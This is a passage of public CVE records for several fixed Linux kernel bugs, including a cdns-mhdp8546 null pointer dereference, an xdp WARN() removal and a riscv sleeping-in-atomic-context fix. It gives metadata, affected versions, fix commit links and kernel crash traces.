0000000000000000 RBX: 0000000000000000 RCX: ffffffff8c992857\n[  770.948872] RDX: 0000000000000001 RSI: 0000000000000001 RDI: ffff9aad82b00330\n[  770.948873] RBP: ffff9aad82b00330 R08: 0000000000000000 R09: ffff9aad87ee3d10\n[  770.948874] R10: 0000000000000200 R11: 0000000000000000 R12: ffff9aad82b00330\n[  770.948874] R13: 0000000000000001 R14: 0000000000000000 R15: 0000000000000001\n[  770.948875] FS:  00007ff1b2f6bb40(0000) GS:ffff9aaf37d00000(0000) knlGS:0000000000000000\n[  770.948878] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[  770.948878] CR2: 0000555f345cb666 CR3: 00000001462dc005 CR4: 0000000000370ee0\n[  770.948879] Call Trace:\n[  770.948880]  \u003cTASK\u003e\n[  770.948881]  ? show_trace_log_lvl+0x1c4/0x2df\n[  770.948884]  ? show_trace_log_lvl+0x1c4/0x2df\n[  770.948886]  ? __cancel_work_timer+0x103/0x190\n[  770.948887]  ? __flush_work.isra.0+0x212/0x230\n[  770.948889]  ? __warn+0x81/0x110\n[  770.948891]  ? __flush_work.isra.0+0x212/0x230\n[  770.948892]  ? report_bug+0x10a/0x140\n[  770.948895]  ? handle_bug+0x3c/0x70\n[  770.948898]  ? exc_invalid_op+0x14/0x70\n[  770.948899]  ? asm_exc_invalid_op+0x16/0x20\n[  770.948903]  ? __flush_work.isra.0+0x212/0x230\n[  770.948905]  __cancel_work_timer+0x103/0x190\n[  770.948907]  ? _raw_spin_unlock_irqrestore+0xa/0x30\n[  770.948910]  drm_kms_helper_poll_disable+0x1e/0x40 [drm_kms_helper]\n[  770.948923]  drm_mode_config_helper_suspend+0x1c/0x80 [drm_kms_helper]\n[  770.948933]  ? __pfx_vmbus_suspend+0x10/0x10 [hv_vmbus]\n[  770.948942]  hyperv_vmbus_suspend+0x17/0x40 [hyperv_drm]\n[  770.948944]  ? __pfx_vmbus_suspend+0x10/0x10 [hv_vmbus]\n[  770.948951]  dpm_run_callback+0x4c/0x140\n[  770.948954]  __device_suspend_noir\n---truncated---"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-06-19T12:37:41.851Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/3d1b47e3a935abd4f258a945db87e7267ff4079c"
        },
        {
          "url": "https://git.kernel.org/stable/c/18451798f4a4e7418b9fad7e7dd313fe84b1f545"
        },
        {
          "url": "https://git.kernel.org/stable/c/5abffb66d12bcac84bf7b66389c571b8bb6e82bd"
        }
      ],
      "title": "drm: Check output polling initialized before disabling",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35927",
    "datePublished": "2024-05-19T10:10:37.069Z",
    "dateReserved": "2024-05-17T13:50:33.128Z",
    "dateUpdated": "2025-06-19T12:37:41.851Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-38548 (GCVE-0-2024-38548)

Vulnerability from cvelistv5 – Published: 2024-06-19 13:35 – Updated: 2025-05-04 09:13

Title

drm: bridge: cdns-mhdp8546: Fix possible null pointer dereference

Summary

In the Linux kernel, the following vulnerability has been resolved: drm: bridge: cdns-mhdp8546: Fix possible null pointer dereference In cdns_mhdp_atomic_enable(), the return value of drm_mode_duplicate() is assigned to mhdp_state->current_mode, and there is a dereference of it in drm_mode_set_name(), which will lead to a NULL pointer dereference on failure of drm_mode_duplicate(). Fix this bug add a check of mhdp_state->current_mode.

Severity ?

5.5 (Medium)


                        
                          CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-476 - NULL Pointer Dereference

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/85d1a27402f81f2e0…
	https://git.kernel.org/stable/c/89788cd9824c28ffc…
	https://git.kernel.org/stable/c/ca53b7efd4ba6ae92…
	https://git.kernel.org/stable/c/dcf53e6103b26e745…
	https://git.kernel.org/stable/c/32fb2ef124c330165…
	https://git.kernel.org/stable/c/47889711da20be9b4…
	https://git.kernel.org/stable/c/935a92a1c40028554…

Impacted products

Vendor

Product

Version

Linux

Affected: fb43aa0acdfd600c75b8c877bdf9f6e9893ffc9b , < 85d1a27402f81f2e04b0e67d20f749c2a14edbb3 (git)
Affected: fb43aa0acdfd600c75b8c877bdf9f6e9893ffc9b , < 89788cd9824c28ffcdea40232c458233353d1896 (git)
Affected: fb43aa0acdfd600c75b8c877bdf9f6e9893ffc9b , < ca53b7efd4ba6ae92fd2b3085cb099c745e96965 (git)
Affected: fb43aa0acdfd600c75b8c877bdf9f6e9893ffc9b , < dcf53e6103b26e7458be71491d0641f49fbd5840 (git)
Affected: fb43aa0acdfd600c75b8c877bdf9f6e9893ffc9b , < 32fb2ef124c3301656ac6c789a2ef35ef69a66da (git)
Affected: fb43aa0acdfd600c75b8c877bdf9f6e9893ffc9b , < 47889711da20be9b43e1e136e5cb68df37cbcc79 (git)
Affected: fb43aa0acdfd600c75b8c877bdf9f6e9893ffc9b , < 935a92a1c400285545198ca2800a4c6c519c650a (git)

Linux

Affected: 5.10
Unaffected: 0 , < 5.10 (semver)
Unaffected: 5.10.219 , ≤ 5.10.* (semver)
Unaffected: 5.15.161 , ≤ 5.15.* (semver)
Unaffected: 6.1.93 , ≤ 6.1.* (semver)
Unaffected: 6.6.33 , ≤ 6.6.* (semver)
Unaffected: 6.8.12 , ≤ 6.8.* (semver)
Unaffected: 6.9.3 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "LOCAL",
              "availabilityImpact": "HIGH",
              "baseScore": 5.5,
              "baseSeverity": "MEDIUM",
              "confidentialityImpact": "NONE",
              "integrityImpact": "NONE",
              "privilegesRequired": "LOW",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-38548",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-20T15:43:16.376326Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-476",
                "description": "CWE-476 NULL Pointer Dereference",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-11-07T16:40:10.480Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T04:12:25.373Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/85d1a27402f81f2e04b0e67d20f749c2a14edbb3"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/89788cd9824c28ffcdea40232c458233353d1896"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ca53b7efd4ba6ae92fd2b3085cb099c745e96965"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/dcf53e6103b26e7458be71491d0641f49fbd5840"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/32fb2ef124c3301656ac6c789a2ef35ef69a66da"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/47889711da20be9b43e1e136e5cb68df37cbcc79"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/935a92a1c400285545198ca2800a4c6c519c650a"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/bridge/cadence/cdns-mhdp8546-core.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "85d1a27402f81f2e04b0e67d20f749c2a14edbb3",
              "status": "affected",
              "version": "fb43aa0acdfd600c75b8c877bdf9f6e9893ffc9b",
              "versionType": "git"
            },
            {
              "lessThan": "89788cd9824c28ffcdea40232c458233353d1896",
              "status": "affected",
              "version": "fb43aa0acdfd600c75b8c877bdf9f6e9893ffc9b",
              "versionType": "git"
            },
            {
              "lessThan": "ca53b7efd4ba6ae92fd2b3085cb099c745e96965",
              "status": "affected",
              "version": "fb43aa0acdfd600c75b8c877bdf9f6e9893ffc9b",
              "versionType": "git"
            },
            {
              "lessThan": "dcf53e6103b26e7458be71491d0641f49fbd5840",
              "status": "affected",
              "version": "fb43aa0acdfd600c75b8c877bdf9f6e9893ffc9b",
              "versionType": "git"
            },
            {
              "lessThan": "32fb2ef124c3301656ac6c789a2ef35ef69a66da",
              "status": "affected",
              "version": "fb43aa0acdfd600c75b8c877bdf9f6e9893ffc9b",
              "versionType": "git"
            },
            {
              "lessThan": "47889711da20be9b43e1e136e5cb68df37cbcc79",
              "status": "affected",
              "version": "fb43aa0acdfd600c75b8c877bdf9f6e9893ffc9b",
              "versionType": "git"
            },
            {
              "lessThan": "935a92a1c400285545198ca2800a4c6c519c650a",
              "status": "affected",
              "version": "fb43aa0acdfd600c75b8c877bdf9f6e9893ffc9b",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/bridge/cadence/cdns-mhdp8546-core.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.10"
            },
            {
              "lessThan": "5.10",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.219",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.161",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.93",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.33",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.12",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.219",
                  "versionStartIncluding": "5.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.161",
                  "versionStartIncluding": "5.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.93",
                  "versionStartIncluding": "5.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.33",
                  "versionStartIncluding": "5.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.12",
                  "versionStartIncluding": "5.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.3",
                  "versionStartIncluding": "5.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "5.10",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm: bridge: cdns-mhdp8546: Fix possible null pointer dereference\n\nIn cdns_mhdp_atomic_enable(), the return value of drm_mode_duplicate() is\nassigned to mhdp_state-\u003ecurrent_mode, and there is a dereference of it in\ndrm_mode_set_name(), which will lead to a NULL pointer dereference on\nfailure of drm_mode_duplicate().\n\nFix this bug add a check of mhdp_state-\u003ecurrent_mode."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:13:45.775Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/85d1a27402f81f2e04b0e67d20f749c2a14edbb3"
        },
        {
          "url": "https://git.kernel.org/stable/c/89788cd9824c28ffcdea40232c458233353d1896"
        },
        {
          "url": "https://git.kernel.org/stable/c/ca53b7efd4ba6ae92fd2b3085cb099c745e96965"
        },
        {
          "url": "https://git.kernel.org/stable/c/dcf53e6103b26e7458be71491d0641f49fbd5840"
        },
        {
          "url": "https://git.kernel.org/stable/c/32fb2ef124c3301656ac6c789a2ef35ef69a66da"
        },
        {
          "url": "https://git.kernel.org/stable/c/47889711da20be9b43e1e136e5cb68df37cbcc79"
        },
        {
          "url": "https://git.kernel.org/stable/c/935a92a1c400285545198ca2800a4c6c519c650a"
        }
      ],
      "title": "drm: bridge: cdns-mhdp8546: Fix possible null pointer dereference",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-38548",
    "datePublished": "2024-06-19T13:35:21.349Z",
    "dateReserved": "2024-06-18T19:36:34.920Z",
    "dateUpdated": "2025-05-04T09:13:45.775Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-42082 (GCVE-0-2024-42082)

Vulnerability from cvelistv5 – Published: 2024-07-29 15:52 – Updated: 2025-11-03 22:01

Title

xdp: Remove WARN() from __xdp_reg_mem_model()

Summary

In the Linux kernel, the following vulnerability has been resolved: xdp: Remove WARN() from __xdp_reg_mem_model() syzkaller reports a warning in __xdp_reg_mem_model(). The warning occurs only if __mem_id_init_hash_table() returns an error. It returns the error in two cases: 1. memory allocation fails; 2. rhashtable_init() fails when some fields of rhashtable_params struct are not initialized properly. The second case cannot happen since there is a static const rhashtable_params struct with valid fields. So, warning is only triggered when there is a problem with memory allocation. Thus, there is no sense in using WARN() to handle this error and it can be safely removed. WARNING: CPU: 0 PID: 5065 at net/core/xdp.c:299 __xdp_reg_mem_model+0x2d9/0x650 net/core/xdp.c:299 CPU: 0 PID: 5065 Comm: syz-executor883 Not tainted 6.8.0-syzkaller-05271-gf99c5f563c17 #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 03/27/2024 RIP: 0010:__xdp_reg_mem_model+0x2d9/0x650 net/core/xdp.c:299 Call Trace: xdp_reg_mem_model+0x22/0x40 net/core/xdp.c:344 xdp_test_run_setup net/bpf/test_run.c:188 [inline] bpf_test_run_xdp_live+0x365/0x1e90 net/bpf/test_run.c:377 bpf_prog_test_run_xdp+0x813/0x11b0 net/bpf/test_run.c:1267 bpf_prog_test_run+0x33a/0x3b0 kernel/bpf/syscall.c:4240 __sys_bpf+0x48d/0x810 kernel/bpf/syscall.c:5649 __do_sys_bpf kernel/bpf/syscall.c:5738 [inline] __se_sys_bpf kernel/bpf/syscall.c:5736 [inline] __x64_sys_bpf+0x7c/0x90 kernel/bpf/syscall.c:5736 do_syscall_64+0xfb/0x240 entry_SYSCALL_64_after_hwframe+0x6d/0x75 Found by Linux Verification Center (linuxtesting.org) with syzkaller.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/1095b8efbb13a6a5f…
	https://git.kernel.org/stable/c/1d3e3b3aa2cbe9bc7…
	https://git.kernel.org/stable/c/4e0c539ee265d5c6e…
	https://git.kernel.org/stable/c/14e51ea78b4ccacb7…
	https://git.kernel.org/stable/c/f92298b0467fd77ed…
	https://git.kernel.org/stable/c/7e9f79428372c6eab…

Impacted products

Vendor

Product

Version

Linux

Affected: 8d5d88527587516bd58ff0f3810f07c38e65e2be , < 1095b8efbb13a6a5fa583ed373ee1ccab29da2d0 (git)
Affected: 8d5d88527587516bd58ff0f3810f07c38e65e2be , < 1d3e3b3aa2cbe9bc7db9a7f8673a9fa6d2990d54 (git)
Affected: 8d5d88527587516bd58ff0f3810f07c38e65e2be , < 4e0c539ee265d5c6e7fa7d229cd4aa7bc01816e2 (git)
Affected: 8d5d88527587516bd58ff0f3810f07c38e65e2be , < 14e51ea78b4ccacb7acb1346b9241bb790a2054c (git)
Affected: 8d5d88527587516bd58ff0f3810f07c38e65e2be , < f92298b0467fd77edc4c1a2c3e48833e69840ec4 (git)
Affected: 8d5d88527587516bd58ff0f3810f07c38e65e2be , < 7e9f79428372c6eab92271390851be34ab26bfb4 (git)

Linux

Affected: 4.18
Unaffected: 0 , < 4.18 (semver)
Unaffected: 5.10.221 , ≤ 5.10.* (semver)
Unaffected: 5.15.162 , ≤ 5.15.* (semver)
Unaffected: 6.1.97 , ≤ 6.1.* (semver)
Unaffected: 6.6.37 , ≤ 6.6.* (semver)
Unaffected: 6.9.8 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:01:14.321Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1095b8efbb13a6a5fa583ed373ee1ccab29da2d0"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1d3e3b3aa2cbe9bc7db9a7f8673a9fa6d2990d54"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4e0c539ee265d5c6e7fa7d229cd4aa7bc01816e2"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/14e51ea78b4ccacb7acb1346b9241bb790a2054c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f92298b0467fd77edc4c1a2c3e48833e69840ec4"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7e9f79428372c6eab92271390851be34ab26bfb4"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42082",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:19:06.855038Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:07.377Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/core/xdp.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "1095b8efbb13a6a5fa583ed373ee1ccab29da2d0",
              "status": "affected",
              "version": "8d5d88527587516bd58ff0f3810f07c38e65e2be",
              "versionType": "git"
            },
            {
              "lessThan": "1d3e3b3aa2cbe9bc7db9a7f8673a9fa6d2990d54",
              "status": "affected",
              "version": "8d5d88527587516bd58ff0f3810f07c38e65e2be",
              "versionType": "git"
            },
            {
              "lessThan": "4e0c539ee265d5c6e7fa7d229cd4aa7bc01816e2",
              "status": "affected",
              "version": "8d5d88527587516bd58ff0f3810f07c38e65e2be",
              "versionType": "git"
            },
            {
              "lessThan": "14e51ea78b4ccacb7acb1346b9241bb790a2054c",
              "status": "affected",
              "version": "8d5d88527587516bd58ff0f3810f07c38e65e2be",
              "versionType": "git"
            },
            {
              "lessThan": "f92298b0467fd77edc4c1a2c3e48833e69840ec4",
              "status": "affected",
              "version": "8d5d88527587516bd58ff0f3810f07c38e65e2be",
              "versionType": "git"
            },
            {
              "lessThan": "7e9f79428372c6eab92271390851be34ab26bfb4",
              "status": "affected",
              "version": "8d5d88527587516bd58ff0f3810f07c38e65e2be",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/core/xdp.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.18"
            },
            {
              "lessThan": "4.18",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.221",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.162",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.97",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.37",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.8",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.221",
                  "versionStartIncluding": "4.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.162",
                  "versionStartIncluding": "4.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.97",
                  "versionStartIncluding": "4.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.37",
                  "versionStartIncluding": "4.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.8",
                  "versionStartIncluding": "4.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "4.18",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nxdp: Remove WARN() from __xdp_reg_mem_model()\n\nsyzkaller reports a warning in __xdp_reg_mem_model().\n\nThe warning occurs only if __mem_id_init_hash_table() returns an error. It\nreturns the error in two cases:\n\n  1. memory allocation fails;\n  2. rhashtable_init() fails when some fields of rhashtable_params\n     struct are not initialized properly.\n\nThe second case cannot happen since there is a static const rhashtable_params\nstruct with valid fields. So, warning is only triggered when there is a\nproblem with memory allocation.\n\nThus, there is no sense in using WARN() to handle this error and it can be\nsafely removed.\n\nWARNING: CPU: 0 PID: 5065 at net/core/xdp.c:299 __xdp_reg_mem_model+0x2d9/0x650 net/core/xdp.c:299\n\nCPU: 0 PID: 5065 Comm: syz-executor883 Not tainted 6.8.0-syzkaller-05271-gf99c5f563c17 #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 03/27/2024\nRIP: 0010:__xdp_reg_mem_model+0x2d9/0x650 net/core/xdp.c:299\n\nCall Trace:\n xdp_reg_mem_model+0x22/0x40 net/core/xdp.c:344\n xdp_test_run_setup net/bpf/test_run.c:188 [inline]\n bpf_test_run_xdp_live+0x365/0x1e90 net/bpf/test_run.c:377\n bpf_prog_test_run_xdp+0x813/0x11b0 net/bpf/test_run.c:1267\n bpf_prog_test_run+0x33a/0x3b0 kernel/bpf/syscall.c:4240\n __sys_bpf+0x48d/0x810 kernel/bpf/syscall.c:5649\n __do_sys_bpf kernel/bpf/syscall.c:5738 [inline]\n __se_sys_bpf kernel/bpf/syscall.c:5736 [inline]\n __x64_sys_bpf+0x7c/0x90 kernel/bpf/syscall.c:5736\n do_syscall_64+0xfb/0x240\n entry_SYSCALL_64_after_hwframe+0x6d/0x75\n\nFound by Linux Verification Center (linuxtesting.org) with syzkaller."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:22:35.267Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/1095b8efbb13a6a5fa583ed373ee1ccab29da2d0"
        },
        {
          "url": "https://git.kernel.org/stable/c/1d3e3b3aa2cbe9bc7db9a7f8673a9fa6d2990d54"
        },
        {
          "url": "https://git.kernel.org/stable/c/4e0c539ee265d5c6e7fa7d229cd4aa7bc01816e2"
        },
        {
          "url": "https://git.kernel.org/stable/c/14e51ea78b4ccacb7acb1346b9241bb790a2054c"
        },
        {
          "url": "https://git.kernel.org/stable/c/f92298b0467fd77edc4c1a2c3e48833e69840ec4"
        },
        {
          "url": "https://git.kernel.org/stable/c/7e9f79428372c6eab92271390851be34ab26bfb4"
        }
      ],
      "title": "xdp: Remove WARN() from __xdp_reg_mem_model()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42082",
    "datePublished": "2024-07-29T15:52:43.989Z",
    "dateReserved": "2024-07-29T15:50:41.170Z",
    "dateUpdated": "2025-11-03T22:01:14.321Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-40915 (GCVE-0-2024-40915)

Vulnerability from cvelistv5 – Published: 2024-07-12 12:24 – Updated: 2025-11-03 21:57

Title

riscv: rewrite __kernel_map_pages() to fix sleeping in invalid context

Summary

In the Linux kernel, the following vulnerability has been resolved: riscv: rewrite __kernel_map_pages() to fix sleeping in invalid context __kernel_map_pages() is a debug function which clears the valid bit in page table entry for deallocated pages to detect illegal memory accesses to freed pages. This function set/clear the valid bit using __set_memory(). __set_memory() acquires init_mm's semaphore, and this operation may sleep. This is problematic, because __kernel_map_pages() can be called in atomic context, and thus is illegal to sleep. An example warning that this causes: BUG: sleeping function called from invalid context at kernel/locking/rwsem.c:1578 in_atomic(): 1, irqs_disabled(): 0, non_block: 0, pid: 2, name: kthreadd preempt_count: 2, expected: 0 CPU: 0 PID: 2 Comm: kthreadd Not tainted 6.9.0-g1d4c6d784ef6 #37 Hardware name: riscv-virtio,qemu (DT) Call Trace: [<ffffffff800060dc>] dump_backtrace+0x1c/0x24 [<ffffffff8091ef6e>] show_stack+0x2c/0x38 [<ffffffff8092baf8>] dump_stack_lvl+0x5a/0x72 [<ffffffff8092bb24>] dump_stack+0x14/0x1c [<ffffffff8003b7ac>] __might_resched+0x104/0x10e [<ffffffff8003b7f4>] __might_sleep+0x3e/0x62 [<ffffffff8093276a>] down_write+0x20/0x72 [<ffffffff8000cf00>] __set_memory+0x82/0x2fa [<ffffffff8000d324>] __kernel_map_pages+0x5a/0xd4 [<ffffffff80196cca>] __alloc_pages_bulk+0x3b2/0x43a [<ffffffff8018ee82>] __vmalloc_node_range+0x196/0x6ba [<ffffffff80011904>] copy_process+0x72c/0x17ec [<ffffffff80012ab4>] kernel_clone+0x60/0x2fe [<ffffffff80012f62>] kernel_thread+0x82/0xa0 [<ffffffff8003552c>] kthreadd+0x14a/0x1be [<ffffffff809357de>] ret_from_fork+0xe/0x1c Rewrite this function with apply_to_existing_page_range(). It is fine to not have any locking, because __kernel_map_pages() works with pages being allocated/deallocated and those pages are not changed by anyone else in the meantime.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/919f8626099d9909b…
	https://git.kernel.org/stable/c/8661a7af049912016…
	https://git.kernel.org/stable/c/d5257ceb19d920691…
